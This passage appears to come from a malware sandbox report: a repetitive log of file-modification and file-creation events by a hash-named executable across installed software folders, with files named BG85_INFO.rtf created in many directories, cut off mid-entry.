c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\charsets.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Anchorage c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\cmm\sRGB.pf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\META-INF\ECLIPSE_.SF c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\feedbck2.gif c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-sendopts_ja.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Riyadh88 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT-8 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\gd\LC_MESSAGES\vlc.mo c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\EditHide.TS c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT+10 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.forms.nl_ja_4.4.0.v20140623020002.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4-dark_mac.css c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\ca.pak c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Belgrade c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\jconsole.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4-dark_win.css c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Kentucky\Louisville c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\modules\sandbox.luac c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\win32\bridge\AccessBridgePackages.h c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica\Casey c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.core\cache\binary\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\Adelaide c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\feature.properties c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\create_form.gif c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\uz\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Juneau c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Macau c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Zurich c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Caracas c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Fakaofo c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US.txt c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\br\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\classes.jsa c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\messages_ko.properties c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.diagnostic.ja_5.5.0.165303.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.updatechecker.nl_ja_4.4.0.v20140623020002.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-modules-profiler-oql.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Prague c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\zh_TW\LC_MESSAGES\vlc.mo c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\nn\LC_MESSAGES\vlc.mo c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Indiana\Indianapolis c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Vienna c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\MST7MDT c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\boot.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\chrome.exe c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Noumea c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jre7\lib\management\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\meta\art\03_lastfm.luac c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\vocaroo.luac c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Costa_Rica c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.resources_3.9.1.v20140825-1431.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Chicago c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\extensions\VLSub.luac c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\time-span-16.png c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.touchpoint.eclipse.nl_zh_4.4.0.v20140623020002.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_default_gtk.css c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\jce.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\management\management.properties c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\El_Salvador c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT-4 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\META-INF\ECLIPSE_.RSA c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.metadata.repository.nl_ja_4.4.0.v20140623020002.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui.sdk.scheduler_1.2.0.v20140422-1847.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\index.html c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Mozilla Firefox\Accessible.tlb c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Tongatapu c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Antarctica\Syowa c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-api-visual_ja.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT+5 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\[email protected] c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Installer\setup.exe c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\Dataset.zip c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT+9 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.repository_2.3.0.v20131211-1531.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\help.gif c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.extensionlocation_1.2.100.v20131119-0908.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\intf\http.luac c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-sendopts_zh_CN.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-api-visual.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\WET c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Windows Mail\en-US\WinMail.exe.mui c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\sv\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\AppConfigurationInternal.zip c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\extcheck.exe c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Pontianak c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.bidi_0.10.0.v20130327-1442.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Chita c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ff\LC_MESSAGES\vlc.mo c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\Mozilla Firefox\browser\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files\VideoLAN\VLC\locale\oc\LC_MESSAGES\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Casablanca c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\lib\gimap.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.model.workbench.nl_zh_4.4.0.v20140623020002.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\ext\jhall-2.0_05.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Port_of_Spain c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\VideoLAN\VLC\hrtfs\dodeca_and_7channel_3DSL_HRTF.sofa c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.hyp c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_ok.gif c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Kuala_Lumpur c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\toc.gif c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\about.html c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\Khartoum c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\SubmitInstall.au3 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Windows Journal\Templates\Seyes.jtp c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\ext\sunec.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-queries_zh_CN.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Kathmandu c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Enderbury c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\Xusage.txt c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\cmm\GRAY.pf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-heapdump.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.core.nl_ja_4.4.0.v20140623020002.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.update.configurator.nl_ja_4.4.0.v20140623020002.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Tirane c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Cartridges\sql90.xsl c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Checkers.api c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\win32_MoveDrop32x32.gif c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\META-INF\MANIFEST.MF c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.core.di_1.4.0.v20140414-1837.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Javascripts\BG85_INFO.rtf c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-selector-ui_zh_CN.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\management\jmxremote.password.template c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Ho_Chi_Minh c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Tehran c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Setup Files\{AC76BA86-7AD7-1033-7B44-A90000000001}\AcroRead.msi c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT-2 c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.console.nl_ja_4.4.0.v20140623020002.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-selector-api_zh_CN.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\console_view.png c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.filesystem_1.4.100.v20140514-1614.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-options-api_zh_CN.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\README.html c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Riyadh c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Boise c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Indian\Mahe c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx.ja_5.5.0.165303.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\ENU\acro20.lng c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\feature.properties c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.frameworkadmin.equinox.nl_ja_4.4.0.v20140623020002.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Shanghai c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-modules-appui_ja.jar c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe File opened for modification C:\Program 